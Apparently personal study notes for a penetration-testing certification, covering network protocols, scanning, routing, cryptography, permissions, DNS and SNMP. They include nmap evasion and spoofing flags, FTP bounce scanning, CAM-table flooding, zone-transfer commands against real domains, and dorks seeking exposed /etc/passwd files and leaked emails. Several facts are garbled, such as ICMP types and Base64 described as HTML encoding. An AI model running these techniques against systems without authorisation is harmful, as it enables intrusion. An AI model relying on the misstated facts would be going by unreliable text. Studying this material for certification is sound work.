- 3. Appendix B: Core Technical Skills B1 - IP Protocols LITA – Link Layer, Internet Layer, Transport Layer, Application Layer Traceroute Traceroute tracks the route packets have taken from an IP network on their way to a given host. It utilizes the IP protocol's time to live (TTL) field and attempts to elicit an ICMP TIME_EXCEEDED response from each gateway along the path to the host. We start our probes with a TTL of one and increase by one until we get an “ICMP port unreachable" (or TCP reset), which means we got to the "host", or hit a max (which defaults to 30 hops) We don't want the destination host to process the UDP probe packets, so the destination port is set to an unlikely value (you can change it with the -p flag). There is no such a problem for ICMP or TCP tracerouting (for TCP we use half-open technique, which prevents our probes to be seen by applications on the destination host). Probe packets are UDP datagrams with so-called "unlikely" destination ports. The "unlikely" port of the first probe is 33434, then for each next probe it is incremented by one. Since the ports are expected to be unused, the destination host normally returns "ICMP port unreachable " as a final response. Can also use -I ICMP which uses icmp echo packets for probes, or -T tcp (using half-open technique), uses the constant destination port (default is 80, http) TTL See OS Fingerprinting below. The time-to-live (TTL) is the number of hops that a packet is permitted to travel before being discarded by a router. The TTL is set in an eight binary digit field in the packet header by the sending host and is used to prevent packets from endlessly circulating on the Internet or other network. When forwarding an IP packet, routers are required to decrease the TTL by at least one (to prevent routing loops). If a packet's TTL field reaches zero, the router detecting it discards the packet and sends an ICMP message back to the originating host - TTL expired in transit. The ping and the traceroute utilities both make use of the TTL. The latter intentionally sends packets with low TTL values so that they will be discarded by each successive router in the destination path. The time between sending a packet and receiving the ICMP message that it was discarded is used to calculate the travel time for each successive hop. A specific TTL number can indicate the maximum range for a packet. For example, zero restricts it to the same host, one to the same subnet, 32 to the same site, 64 to the same region and 128 to the same continent; 255 is unrestricted. Default TLL Values Linux 64 FreeBSD 64 Windows 128 Cisco 255 IPv4 IPv4 is a connectionless protocol for use on packet-switched networks. It operates on a best effort delivery model, in that it does not guarantee delivery, nor does it assure proper sequencing or avoidance of duplicate delivery. IPv4 uses 32-bit addresses which limits the address space to 4294967296 (232) addresses. IPv4 reserves special address blocks for private networks (~18 million addresses) and multicast addresses (~270 million addresses).
- 4. IPv6 IPv6 uses a 128-bit address, theoretically allowing 2128 , or approximately 3.4×1038 addresses. The actual number is slightly smaller, as multiple ranges are reserved for special use or completely excluded from use. The total number of possible IPv6 addresses is more than 7.9×1028 times as many as IPv4, which uses 32-bit addresses and provides approximately 4.3 billion addresses. The two protocols are not designed to be interoperable, complicating the transition to IPv6. However, several IPv6 transition mechanisms have been devised to permit communication between IPv4 and IPv6 hosts. Research has shown that the use of fragmentation can be leveraged to evade network security controls. As a result, RFC 7112 requires that the first fragment of an IPv6 packet contains the entire IPv6 header chain, such that some very pathological fragmentation cases are forbidden. TCP 65535 TCP ports TCP provides reliable, ordered, and error-checked delivery of a stream of octets (bytes) between applications running on hosts communicating by an IP network. Major Internet applications such as the World Wide Web, email, remote administration, and file transfer rely on TCP. Scanning: Vanilla: SYN, SYN/ACK, ACK, Port Closed: SYN, RST/ACK, Half Open: SYN, SYN/ACK, RST Inverse TCP Scanning Stealth Scanning – Use malformed TCP requests because responses are only sent back by closed ports. RFC 793 – If a port is closed, an RST/ACK packet should be sent to close the connection (an open port will not respond (but it will with SYN ACK?), hence if no response then port is open or server is down). MS systems disregard RFC 793, so it only works against *nix systems. Attacker can send: A FIN TCP packet An XMAS probe with the FIN, URG, and PUSH TCP flags sent A NULL probe with no TCP flags set FTP Bounce Scanning – FTP Port Kind of like an old SSRF. There is a flaw in the way some FTP servers handle the PORT command. Once logged into the server enter passive mode (QUOTE PASV), after which a PORT command is issued telling FTP service to connect to a specific port on a target server (PORT 144,51,17,230,0,23 will attempt to connect to 144.51.17.230 port 23) followed by a LIST command. If a 226 response is received then target host is open, if 425 then the connection has been refused. UDP Applications that do not require reliable data stream service may use the User Datagram Protocol (UDP), which provides a connectionless datagram service that emphasizes reduced latency over reliability. With UDP, computer applications can send messages, in this case referred to as datagrams, to other hosts on an Internet Protocol (IP) network. Prior communications are not required in order to set up communication channels or data paths. UDP uses a simple connectionless communication model with a minimum of protocol mechanism. UDP provides checksums for data integrity, and port numbers for addressing different functions at the source and destination of the datagram. It has no handshaking dialogues, and thus exposes the user's program to any unreliability of the underlying network; There is no guarantee of delivery, ordering, or duplicate protection. Scanning: Since connectionless, you only have two options. Send a probe to all 65535 ports and wait for ICMP destination port unreachable to identify ports which are not accessible, or send specific application requests (SNMP, Dig, TFTP) and await a response (as these responses are processed by the application and not the TCPIP stack)
- 5. Port Open: UDP Probe Packet – No Response. Port Closed: UDP Probe Packet – Host would send ICMP Destination Port Unreachable – this negative scanning allows to interfere which ports are open (as they don’t send messages) nmap -sU ICMP The Internet Control Message Protocol (ICMP) is a supporting protocol in the Internet protocol suite. The ICMP header starts after the IPv4 header and is identified by IP protocol number '1’. All ICMP packets have an 8-byte header and variable-sized data section. The first 4 bytes of the header have fixed format, while the last 4 bytes depend on the type/code of that ICMP packet. Code 00 is ping reply, 51 is host redirect. Useful ICMP Messages: o Echo Request – Ping packet (Type 7, Type 0 is reply) o Timestamp Request – In decimal format representing time elapsed since mid-night GMT (Type 13, 14 is reply) o Information Request (Type 15) – RARP, BOOP, DHCP o Subnet Address Mask Request (Type 17, Type 18 is Reply) o Parameter Problem (Type 12) o Time Exceeded (Type 11) o Redirect (Type 5) o Source Quench (Type 4) o Destination Unreachable (Type 3) Awareness that other IP protocols exist. B2 - Network Architectures Varying networks types that could be encountered during a penetration test: CAT 5 / Fibre Category 5 cable, commonly referred to as Cat 5, is a twisted pair cable for computer networks. The cable standard provides performance of up to 100 MHz and is suitable for most varieties of Ethernet over twisted pair. Cat 5 is also used to carry other signals such as telephony and video. Optical fiber works by drawing on light as opposed to electricity as a means of transmitting signals. As we all know, light is the fastest mode of transmitting any information which is great for businesses with the need for speed. And because fiber optic cabling has a much cleaner signal than conventional copper cabling, it is able to transmit signals faster than ever before. 10/100/1000baseT Definition of: 10/100 Ethernet - An Ethernet network transmitting at 10 and 100 Mbps. Very old computers are limited to 10 Mbps, and most computers support 10/100 or 10/100/1000 (Gigabit Ethernet). 1000Base-T is a type of gigabit Ethernet networking technology that uses copper cables as a medium. 1000Base-T uses four pairs of Category 5 unshielded twisted pair cables to achieve gigabit data rates. The standard is designated as IEEE 802.3ab and allows 1 Gbps data transfers for distances of up to 330 feet. Fast Ethernet is a collective term for a number of Ethernet standards that carry traffic at the nominal rate of 100 Mbit/s (the earlier Ethernet speed was 10 Mbit/s). Of the Fast Ethernet standards, 100BASE-TX is by far the most common. Token ring Token Ring local area network (LAN) technology is a communications protocol for local area networks. It uses a special three-byte frame called a "token" that travels around a logical "ring" of workstations or servers. This token passing is a channel access method providing fair access for all stations and eliminating the collisions of contention- based access methods.
- 6. Wireless (802.11) IEEE 802.11 is a set of media access control (MAC) and physical layer (PHY) specifications for implementing wireless local area network (WLAN) computer communication in the 900 MHz and 2.4, 3.6, 5, and 60 GHz frequency bands. Security implications of shared media, switched media and VLANs. Collision domain: It can be defined as a set of LAN devices whose frames could collide with one another. Broadcast Domain: Broadcast domain can also be seen as a collision domain. It can be defined as a set of devices such that when one device sends a broadcast frame all other devices will receive that frame in the same broadcast domain. HUB: HUB works on L1 of OSI. Only one data packet can pass through the hub at a time. A lot of collisions are present, because of only 1 collision domain. Switch: It supports simultaneous connections. It sends traffic to the destination port. This is done because of a feature known as ARP (Address resolution protocol). The main job carried by this protocol is that it converts IP to MAC address. Access switches or L2 switches operate at L2 (data link layer), source MAC and destination MAC. Routers: Works on L3 of OSI Routers doesn’t propagate broadcast traffic, two different subnets/LAN/Networks communicate through router via routing protocols. Routers can take and forward "unicast" traffic. Each interface present on router gives rise to broadcast domain Bridges and Hubs = 1 broadcast domain and 1 collision domain. Switch = 1 BC domain per each VLAN and 1 collision domain / port. Routers = 1 BC domain and 1 collision domain / port. CAM Table Overflow Ethernet switches use Content Addressable Memory (CAM) tables to map MAC addresses and VLAN assignments to individual ports, so that network frames are delivered correctly. The macof utility can be used to flood a switch with random Ethernet frames resulting in a CAM overflow. The switch will fail open and broadcast them to all ports (becoming a hub) B3 - Network Routing RIP The Routing Information Protocol (RIP) is one of the oldest distance-vector routing protocols which employ the hop count as a routing metric. RIP prevents routing loops by implementing a limit on the number of hops allowed in a path from source to destination. The largest number of hops allowed for RIP is 15, which limits the size of networks that RIP can support. In RIPv1 router broadcast updates with their routing table every 30 seconds. UDP 520 The hop count 1 denotes a network that is directly connected to the router. 16 hops denote a network that is unreachable, according to the RIP hop limit. Due to the deficiencies of the original RIP specification, RIP version 2 (RIPv2) was developed in 1993 and last standardized in 1998 in RFC 2453. It included the ability to carry subnet information, thus supporting Classless Inter- Domain Routing (CIDR). To maintain backward compatibility, the hop count limit of 15 remained.
- 7. OSPF Open Shortest Path First (OSPF) uses a link state routing (LSR) algorithm and falls into the group of interior gateway protocols (IGPs), operating within a single autonomous system (AS). OSPF supports the Classless Inter-Domain Routing (CIDR) addressing model. OSPF is a widely used IGP in large enterprise networks. IGRP Interior Gateway Routing Protocol (IGRP) is a distance vector interior gateway protocol (IGP) developed by Cisco. It is used by routers to exchange routing data within an autonomous system. IGRP is a proprietary protocol. IGRP was created in part to overcome the limitations of RIP (maximum hop count of only 15, and a single routing metric) when used within large networks. IGRP supports multiple metrics for each route, including bandwidth, delay, load, and reliability; to compare two routes these metrics are combined together into a single metric, using a formula which can be adjusted through the use of pre-set constants. The maximum configurable hop count of IGRP-routed packets is 255 (default 100), and routing updates are broadcast every 90 seconds (by default). IGRP uses protocol number 9 for communication. IGRP is considered a classful routing protocol. Because the protocol has no field for a subnet mask, the router assumes that all subnetwork addresses within the same Class A, Class B, or Class C network have the same subnet mask as the subnet mask configured for the interfaces in question. This contrasts with classless routing protocols that can use variable length subnet masks. Classful protocols have become less popular as they are wasteful of IP address space. EIGRP Enhanced Interior Gateway Routing Protocol (EIGRP) is an advanced distance-vector routing protocol that is used on a computer network for automating routing decisions and configuration. The protocol was designed by Cisco Systems as a proprietary protocol, available only on Cisco routers. Partial functionality of EIGRP was converted to an open standard in 2013[1] and was published with informational status as RFC 7868 in 2016. EIGRP is used on a router to share routes with other routers within the same autonomous system. Unlike other well known routing protocols, such as RIP, EIGRP only sends incremental updates, reducing the workload on the router and the amount of data that needs to be transmitted. EIGRP replaced the Interior Gateway Routing Protocol (IGRP) in 1993. One of the major reasons for this was the change to classless IPv4 addresses in the Internet Protocol, which IGRP could not support. B4 - Network Mapping & Target Identification Analysis of output from tools used to map the route between the engagement point and a number of targets. Traceroute to port traceroute -T -p 80 x.x.x.x where -p 80 is port, sometimes get different route to 443. nping --tr, --traceroute Traceroute mode (can only be used with TCP/UDP/ICMP modes). Nmap -sn (-sP) – No port scans after host discovery; -Pn – No ping after host discovery Windows tracert - The TRACERT diagnostic utility determines the route to a destination by sending Internet Control Message Protocol (ICMP) echo packets to the destination. In these packets, TRACERT uses varying IP Time-To-Live (TTL) values. Because each router along the path is required to decrement the packet's TTL by at least 1 before forwarding the packet, the TTL is effectively a hop counter. When the TTL on a packet reaches zero (0), the router sends an ICMP "Time Exceeded" message back to the source computer. (contrast ICMP message with Traceroute – same?) Linux traceroute – see above
- 8. Network sweeping techniques to prioritise a target list and the potential for false negatives. Ping sweep? As RPC uses high ephemeral ports some port scanners incorrectly identify the open port as a different service if they are only doing identification via port number. You can eliminate this via using nmaps -sR flag B6 - Filtering Avoidance Techniques The importance of egress and ingress filtering, including the risks associated with outbound connections. Egress filtering is a basic principle that should be implemented at every organization to prevent hacking activity from leaving your network. We always do ingress filtering. That is, we only allow trusted and known traffic into the firewall from the internet. This traffic is typically allowed into a DMZ and then traffic from the DMZ is allowed through to the internal network. This traffic is allowed only from selected IP addresses and specific ports. Everything else is blocked. B7 - Packet Crafting Packet crafting to meet a particular requirement: Modifying source ports, Spoofing Source (S) IP addresses, Manipulating TTL’s, Fragmentation Nmap 1 FIREWALL/IDS EVASION AND SPOOFING: -f --mtu <val>: fragment packets (optionally w/given MTU) -S <IP_Address>: Spoof source address -g/--source-port <portnum>: Use given port number --ttl <val>: Set IP time-to-live field - D decoy -sS TCP SYN scan -sT TCP Connect scan -sU UDP Scan -sV Version Detection -sA TCP ACK Port Scan -sP: No port scan -p Port Ranges -p U:53,111,137,T:21-25,80,139,8080 (Exam tried to confuse with -p0) -Pn No Ping (Exam tried to confuse with -p0, lower vs upper case P) -sn Host Discovery Only – No Port Scanning Nmap Proxy Chaining Create a proxy via SSH to scan from your client to a target located on network which the SSH server can access. Below command will create a tunnel starting at port 9050 on my local host to the target machine, 192.168.217.144. The -N and -f indicate that I do not want to run a command and want to fork into the background. I chose port 9050 because it is the default port for the proxychains tool ssh username@192.168.217.144 -D 9050 -N -f Now that the tunnel is set up I can scan the internal network looking for webservers: proxychains nmap -n -sT -p 80 192.168.217.0/24 1 https://nmap.org/book/man-briefoptions.html
- 9. Generating ICMP packets Ping generates ICMP. Nmap does is it with more options: nmap -sP -PE scanme.nmap.org PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes Ping Broadcast The last octet is reserved as broadcast address which is used to send traffic to all hosts within a subnet. ping -b 10.10.5.255 You can also send a broadcast to other subnets: ping -b 255.255.255.255 B8 - OS Fingerprinting Remote operating system fingerprinting; active and passive techniques. OS DETECTION: -O: Enable OS detection --osscan-limit: Limit OS detection to promising targets --osscan-guess: Guess OS more aggressively Active fingerprinting works by sending packets to a target and analysing the packets that are sent back. Passive fingerprinting sniffs TCP/IP ports, rather than generating network traffic by sending packets to them. Hence, it’s a more effective way of avoiding detection or being stopped by a firewall. While sniffing traffic, passive fingerprinting does its best to determine a target machine’s OS by analysing the initial Time to Live (TTL) in packet IP headers, and the TCP window size in the first packet of a TCP session, which is usually either a SYN (synchronize) or SYN/ACK (synchronize and acknowledge) packet. Understanding TTL to map OS: 123 is near 128 which is default Windows, so likely a Windows host which is 5 hops away as each hop reduces the TTL (https://subinsb.com/default-device-ttl-values) When used in Ping, the TTL of the remote host is returned. In below example for theguardian.co.uk ping returns TTL of 60. (Linux default: 64/255) Pinging theguardian.co.uk [151.101.0.233] with 32 bytes of data: Reply from 151.101.0.233: bytes=32 time=15ms TTL=60 …when we trace to same host we see it is 5 hops, but first hop does not count as its from localhost to router and TTL only decrements from router. Hence 4 hops are added to the 60 we have, hence TTL is 64 meaning a Unix host. ping -4 localhost # -4 forces IP4 usage Reply from 127.0.0.1: bytes=32 time<1ms TTL=128 B9 - Application Fingerprinting and Evaluating Unknown Services Determining server types and network application versions from application banners. WTF… Evaluation of responsive but unknown network applications. More WTF… B10 - Network Access Control Analysis Reviewing firewall rule bases and network access control lists. OK, whatever…final has to be drop all ANY ANY DENY/DROP
- 10. B11 - Cryptography Differences between encryption and encoding. Encoding transforms data into another format using a scheme that is publicly available so that it can easily be reversed. Encoding is for maintaining data usability and uses schemes that are publicly available. Encoding is the process of transforming data so that it may be transmitted without danger over a communication channel or stored without danger on a storage medium. For instance, computer hardware does not manipulate text, it merely manipulates bytes, so a text encoding is a description of how text should be transformed into bytes. HTML Encoding Base32/64 are examples are HTML encoding. To display an HTML page correctly, a web browser must know which character set (character encoding) to use. ASCII was the first character encoding standard (also called character set). ASCII defined 128 different alphanumeric characters that could be used on the internet. ANSI (Windows-1252) was the original Windows character set, with support for 256 different character codes. ISO-8859-1 was the default character set for HTML 4. This character set also supported 256 different character codes. Because ANSI and ISO-8859-1 were so limited, HTML 4 also supported UTF-8. UTF-8 (Unicode) covers almost all of the characters and symbols in the world. The default character encoding for HTML5 is UTF-8. <meta charset="UTF-8"> Similarly, HTTP does not allow all characters to be transmitted safely, so it may be necessary to encode data using base64 (uses only letters, numbers and two safe characters) or other encoding schemes such as HTMLEncode. When encoding or decoding, the emphasis is placed on everyone having the same algorithm, and that algorithm is usually well-documented, widely distributed and fairly easily implemented. Anyone is eventually able to decode encoded data. Base64 is a form of HTML encoding. Base32 is valid transfer encoder, but not useful due to limited character set. It uses a 32-character set comprising the twenty-six upper-case letters A–Z, and the digits 2–7. IIS HTMLEncode converts characters as follows: The less-than character (<) is converted to < The ampersand character (&) is converted to & Symmetric / asymmetric encryption Private(Secret) Key / Public Key Symmetry – meaning two things are the same. In cryptography it refers to the key, which is used to encrypt and decrypt the plain text. Public key use different keys to encrypt and decrypt. It uses key pairs. Each user gets two keys, a public key for the public and a private key which is kept secret. Anything which is encrypted with one key from that pair can be decrypted with that pair. Keys must be from the same pair. It is slower but provides manageable key counts for large organisations. Block cipher and cipher block chaining (CBC) A block cipher is a method of encrypting text (to produce ciphertext) in which a cryptographic key and algorithm are applied to a block of data (for example, 64 contiguous bits) at once as a group rather than to one bit at a time. The main alternative method, used much less frequently, is called the stream cipher. Cipher block chaining (CBC) is a mode of operation for a block cipher where the cipher text of the previous block impacts the next block. It uses a chaining mechanism that causes the decryption of a block of ciphertext to depend
- 11. on all the preceding ciphertext blocks. As a result, the entire validity of all preceding blocks is contained in the immediately previous ciphertext block. A single bit error in a ciphertext block affects the decryption of all subsequent blocks. Rearrangement of the order of the ciphertext blocks causes decryption to become corrupted. Encryption algorithms: DES, 3DES, AES, RSA, RC4. DES - The Data Encryption Standard (DES) is a symmetric-key algorithm for the encryption of electronic data. DES is now considered to be insecure for many applications. This is mainly due to the 56-bit key size being too small. 3DES - Triple DES (3DES), officially the Triple Data Encryption Algorithm (TDEA or Triple DEA), is a symmetric-key block cipher, which applies the DES cipher algorithm three times to each data block. Key sizes 168, 112 or 56 bits (keying option 1, 2, 3 respectively) (multiples of 56) AES - Advanced Encryption Standard (AES), also known by its original name Rijndael is a specification for the encryption of electronic data established by the U.S. National Institute of Standards and Technology (NIST) in 2001. AES is a subset of the Rijndael cipher developed by two Belgian cryptographers. It supersedes the Data Encryption Standard (DES) which was published in 1977. The algorithm described by AES is a symmetric-key algorithm. Keys: 128, 192 and 256 bits (multiples of 64) RSA - An asymmetric cryptographic algorithm. It is based on the fact that finding the factors of an integer is hard (the factoring problem). A user of RSA creates and then publishes the product of two large prime numbers, along with an auxiliary value, as their public key. The prime factors must be kept secret. Anyone can use the public key to encrypt a message, but with currently published methods, if the public key is large enough, only someone with knowledge of the prime factors can feasibly decode the message. RC4 – (Exam tried to confuse with RC5) In cryptography, RC4 (Rivest Cipher 4) is a stream cipher (as contrasted with CBC). While remarkable for its simplicity and speed in software, multiple vulnerabilities have been discovered in RC4, rendering it insecure. RC4 is a symmetric stream cipher that was used widely to encrypt network communications in the 1980s and 1990s. It was originally not widely used because it was maintained as a proprietary trade secret but the algorithm has since become public knowledge. A stream cipher is a symmetric key cipher where plaintext digits are combined with a pseudorandom cipher digit stream (keystream). In a stream cipher, each plaintext digit is encrypted one at a time with the corresponding digit of the keystream, to give a digit of the ciphertext stream. Hashes: SHA1 and MD5 SHA-1 (Secure Hash Algorithm 1) is a cryptographic hash function which takes an input and produces a 160-bit (20- byte) hash value known as a message digest - typically rendered as a hexadecimal number, 40 digits long. The MD5 algorithm is a widely used hash function producing a 128-bit hash value. Although MD5 was initially designed to be used as a cryptographic hash function, it has been found to suffer from extensive vulnerabilities. It can still be used as a checksum to verify data integrity, but only against unintentional corruption. 32 digits long Like most hash functions, MD5 is neither encryption nor encoding. It can be cracked by brute-force attack and suffers from extensive vulnerabilities. Message Integrity codes: HMAC (Hashed Message Authentication Code) In cryptography, an HMAC (sometimes dis-abbreviated as either keyed-hash message authentication code or hash- based message authentication code) is a specific type of message authentication code (MAC) involving a cryptographic hash function and a secret cryptographic key. It may be used to simultaneously verify both the data integrity and the authentication of a message, as with any MAC. Any cryptographic hash function, such as MD5 or SHA-1, may be used in the calculation of an HMAC; the resulting MAC algorithm is termed HMAC-X, where X is the hash function used (e.g. HMAC-MD5 or HMAC-SHA1). The cryptographic strength of the HMAC depends upon the cryptographic strength of the underlying hash function, the size of its hash output, and the size and quality of the key.
- 12. Perfect forward secrecy (PFS) In cryptography, forward secrecy (FS), also known as perfect forward secrecy (PFS), is a feature of specific key agreement protocols that gives assurances your session keys will not be compromised even if the private key of the server/host is compromised. Forward secrecy protects past sessions against future compromises of secret keys or passwords. Diffie-Hellman Key Exchange Diffie-Hellman is a way of generating a shared secret between two people in such a way that the secret can't be seen by observing the communication. That's an important distinction: You're not sharing information during the key exchange, you're creating a key together. This is particularly useful because you can use this technique to create an encryption key with someone, and then start encrypting your traffic with that key. And even if the traffic is recorded and later analysed, there's absolutely no way to figure out what the key was, even though the exchanges that created it may have been visible. This is where perfect forward secrecy comes from. Nobody analysing the traffic at a later date can break in because the key was never saved, never transmitted, and never made visible anywhere. Even though it uses the same underlying principles as public key cryptography, this is not asymmetric cryptography because nothing is ever encrypted or decrypted during the exchange. It is, however, an essential building-block, and was in fact the base upon which asymmetric crypto was later built. Diffie-Hellman is an algorithm used to establish a shared secret between two parties. It is primarily used as a method of exchanging cryptography keys for use in symmetric encryption algorithms like AES. Elliptic-curve cryptography (ECC) A prime number can only be divided by 1 or itself. Prime numbers: 2, 3, 5, 7, 11, 13, and 17 Elliptic-curve cryptography (ECC) is an approach to public-key cryptography based on the algebraic structure of elliptic curves over finite fields. ECC requires smaller keys compared to non-ECC cryptography (based on plain Galois fields) to provide equivalent security.
- 13. Elliptic curves are applicable for key agreement, digital signatures, pseudo-random generators and other tasks. Indirectly, they can be used for encryption by combining the key agreement with a symmetric encryption scheme. The primary benefit promised by elliptic curve cryptography is a smaller key size, reducing storage and transmission requirements, i.e. that an elliptic curve group could provide the same level of security afforded by an RSA-based system with a large modulus and correspondingly larger key: for example, a 256-bit elliptic curve public key should provide comparable security to a 3072-bit RSA public key. B12 - Applications of Cryptography SSL SSL: Transport Layer Security (TLS) – and its predecessor, Secure Sockets Layer (SSL), are cryptographic protocols that provide communications security over a computer network. SSL runs on layer 4 (the transport layer) of the OSI model, above TCP/IP and below HTTP. The TLS protocol aims primarily to provide privacy and data integrity between two communicating computer applications. A client server connection will have one or more of the following properties: The connection is private (or secure) because symmetric cryptography is used to encrypt the data transmitted. The keys for this symmetric encryption are generated uniquely for each connection and are based on a shared secret negotiated at the start of the session. The server and client negotiate the details of which encryption algorithm and cryptographic keys to use before the first byte of data is transmitted. The identity of the communicating parties can be authenticated using public-key cryptography (typically the server). The connection ensures integrity because each message transmitted includes a message integrity check using a message authentication code to prevent undetected loss or alteration of the data during transmission. IPsec IPSec: IPsec is typically used in conjunction with IKE (Internet Key Exchange) for key management. IPsec works at layer 3 (the network layer) of the OSI network model to encapsulate normal IP packets. Once a VPN tunnel has been established, any application (Web, e-mail, FTP, telnet, even VoIP) can use it without discrimination. IPsec supports multiple encryption algorithms (AES, DES, 3DES, RC4) and multiple integrity mechanisms (MD5, SHA- 1), as well as authentication via X.509 certificates. SSH See SSH. PGP PGP: PGP uses symmetric and asymmetric keys to encrypt data being transferred across networks. It was developed by the American computer scientist Phil Zimmerman, who made it available for non-commercial use for no charge in 1991. To encrypt data, PGP generates a symmetric key to encrypt data which is protected by the asymmetric key. Common wireless (802.11) encryption protocols: WEP, WPA, TKIP (see below) B13 - File System Permissions File permission attributes within Unix and Windows file systems and their security implications. UNIX: Owner, Group, Other (Everyone) have r(4) w(2) x(1) If the file is owned by the user, the user permissions determine the access. If the group of the file is the same as the user's group, the group permission determines the access If the user is not the file owner, and is not in the group, then the other permission is used.
- 14. chmod u+rwx test. $ ls -l drwxr--r-- 1 fred editors 4096 drafts In this example, drafts is a directory (denoted by the file descriptor d), and the characters after this indicate the permissions: rwx: the owner (fred) has the right to read (r), write (w) and execute (x) r--: group members (users part of the editors group) have read-only permissions; write and execute are not permitted, as denoted by the hyphen characters (-) r--: others (users aside from the owner or members of editors) have read-only permissions; write and execute are not permitted Windows Permissions The system account and the administrator account (Administrators group) have the same file privileges, but they have different functions. The system account is used by the operating system and by services that run under Windows. When an object is copied into another directory it inherits the access privileges in place at the destination folder. When a file or directory object is moved from one directory to another directory, the NTFS permissions that have been applied to the file move with it. The way permissions work is cumulative to give the most restrictive of Share and NTFS the actual access. If "Tom" who is in the "Sales", "Finance" and "Staff" group has: Share Permissions: Sales – Read, Staff – Modify, Finance – Read NTFS Permissions: Sales – Modify, Staff – Modify, Finance - Read His effective NTFS permissions are "Modify" as it's the least restrictive when looking at NTFS only, and his cumulative share permissions are "Read" as it's the most restrictive. If we tweak that a little and you have: Share Permissions: Sales – Read, Staff – Read, Finance – Read NTFS Permissions: Sales – Modify, Staff – Modify, Finance - Read His cumulative NTFS permissions are Modify, but his cumulative share permissions are Read. The exception to this is that the no-access permission overrides all other permissions (both for NTFS and Share). For example, Read (NTFS) + no access (NTFS) = no access (NTFS) Read (shared folder) + no access (shared folder) = no access (shared folder) TrustedInstaller TrustedInstaller.exe is Windows Module Installer service which is part of Windows Resource Protection. Trusted Installer SID is the ‘owner’ of most system files and registry entries. If someone with administrative rights attempts to modify or replace a file that is protected by WRP, he will be presented with the message "Access Denied". Analysing registry ACLs. B14 - Audit Techniques Listing processes and their associated network sockets (if any). Windows - netstat -nao (aon) -b will list the application
- 15. Linux - lsof -i or netstat -lptu List open ports and the processes that own them. To see which process is bound to say port 22 use: lsof –i :22 Assessing patch levels. Linux – uname -a Windows Power Shell – Get-Hotfix - Gets the hotfixes that have been applied to the local and remote computers. Systeminfo – will list patches as well as other system info wmic qfe – (QFE - Quick Fix Engineering) Can be run with a number of switches: wmic qfe list wmic qfe list full systeminfo Finding interesting files. Linux: Find all the files whose name is tecmint.txt in a current working directory. Find . -name -type # find . -name tecmint.txt ./tecmint.txt Find all the files under /home directory with name tecmint.txt. Use iname for case insensitivity. # find /home -name tecmint.txt /home/tecmint.txt Find all php files in a directory. # find . -type f -name "*.php" ./tecmint.php ./login.php ./index.php Find err files in the /home/username/ directory and all sub-directories: find /home/username/ -name "*.err" Find all .jpg files in the /home and sub-directories: find /home -name *.jpg -type: Specifies file type: f=plain text, d=directory
- 16. Appendix C: Background Information Gathering & Open Source C1 - Registration Records Information contained within IP and domain registries (WHOIS). Loads of info there… WHOIS - A protocol for searching internet registration databases based on RFC 3912 for domain names, IPs, autonomous systems, etc. whois example.com C2 - Domain Name Server (DNS) DNS zone transfers AXFR - Asynchronous Full Transfer Zone (DNS request) dig +short example.com dig @<name-server-of-target> <target-host-or-address> axfr dig @ns2.iitk.ac.in iitk.ac.in axfr The command to lookup a name server through dig goes like: dig <target-host> ns For finding the name servers of the target in the last example, we can use: dig iitk.ac.in ns nslookup server <DNS Server Name OR ip address of DNS server> set type=any ls -d <DNS Zone Name> > dnstest.txt exit Host command can be used to get a list of authoritative name servers for a given domain Host -l ucia.gov DNS PTR Records PTR records are written in reverse. A record for network 198.81.129.0 would be queried (with zone transfer) as: dig @ns-server 129.81.198.in-addr.arpa axfr Zone file extract ; forward zone file for example.com mail IN A 192.168.0.7 www IN CNAME 192.168.0.7 ... # reverse map zone file for 0.168.192.IN-ADDR.ARPA # the IP zone is mapped first ... 7 IN PTR mail.example.com. # the 7 is the last IP, 192.168.0.7 7 IN PTR www.example.com. You can also point a specific IP address: 1.0.168.192.in-addr.arpa. IN PTR dns1.example.org. DNS Version Information Dig @nameserver version.bind chaos txt Can also be done using nslookup by setting class=chaos
- 17. DNS queries and responses DNS zone transfers, Structure, interpretation and analysis of DNS records: SOA, MX, TXT, A, NS, PTR, HINFO, CNAME TXT: A TXT record (short for text record) is a type of resource record in the Domain Name System (DNS) used to provide the ability to associate arbitrary text with a host or other name, such as human readable information about a server, network, data centre, or other accounting information. The text record can hold arbitrary non-formatted text string. Typically, the record is used by Sender Policy Framework (SPF) to prevent fake emails to appear to be sent by you. HINFO: Host Information - A HINFO-record specifies the host / server's type of CPU and operating system. This information can be used by application protocols such as FTP, which use special procedures when communicating with computers of a known CPU and operating system type. AAAA: IPv6 record C3 - Customer Web Site Analysis Analysis of information from a target web site, both from displayed content and from within the HTML source. Yes, easy one that… C4 - Google Hacking and Web Enumeration Google Dorks site:paypal.com -www.paypal.com : this removes known domains, keep doing until exhausted all sub domains site.com –www –cdn site:pastebin.com intext:@gmail.com | @yahoo.com | @hotmail.com daterange:2457388-2457491 inurl:slatergordon.com.au $keyword: password, username, sql, filetype:txt, inurl:/etc/passwd%00 intext:root Sometimes the tools will miss pages, try .php?= or inurl:"?id=“ site:https://play.esea.net/ ext:php filetype:xlsx site: intitle:index of site: inurl:etc/passwd site: intext: C5 - NNTP Newsgroups and Mailing Lists C6 - Information Leakage from Mail & News Headers
- 18. Appendix D: Networking Equipment D1 - Management Protocols Weaknesses in the protocols commonly used for the remote management of devices: Telnet If you need root access via telnet: Edit /etc/pam.d/login and /etc/pam.d/remote files to hash out line as below: #auth required pam_securetty.so Also mentioned is edit the file /etc/securetty and add the following to the end of the file: pts/0 Web based protocols SSH See SSH SNMP UDP ports 161 and 162 SNMP depends on secure strings (or “community strings”) that grant access to portions of devices’ management planes. Abuse of SNMP could allow an unauthorized third party to gain access to a network device. SNMPv3 should be the only version of SNMP employed because SNMPv3 has the ability to authenticate and encrypt payloads. When either SNMPv1 or SNMPv2 are employed, an adversary could sniff network traffic to determine the community string. This compromise could enable a man-in-the-middle or replay attack. Although SNMPv1 and SNMPv2 have similar characteristics, 64-bit counters were added to SNMPv2 so it could support faster interfaces. SNMPv3 replaces the simple/clear text password sharing used in SNMPv2 with more securely encoded parameters. SNMP version 3 adds both encryption and authentication, which can be used together or separately. Mistakes in the configuration of the read-write mode can make a network susceptible to attacks. SNMP v1 sends passwords in clear-text over the network. SNMP v2 allows password encryption (hashing?) with MD5, but this has to be configured. SNMP v3 uses MD5, Secure Hash Algorithm (SHA) and keyed algorithms to offer protection against unauthorised data modification and masquerade attacks. The authentication mechanism in SNMPv3 assures that a received message was, in fact, transmitted by the principal whose identifier appears as the source in the message header. In addition, this mechanism assures that the message was not altered in transit and that it was not artificially delayed or replayed.
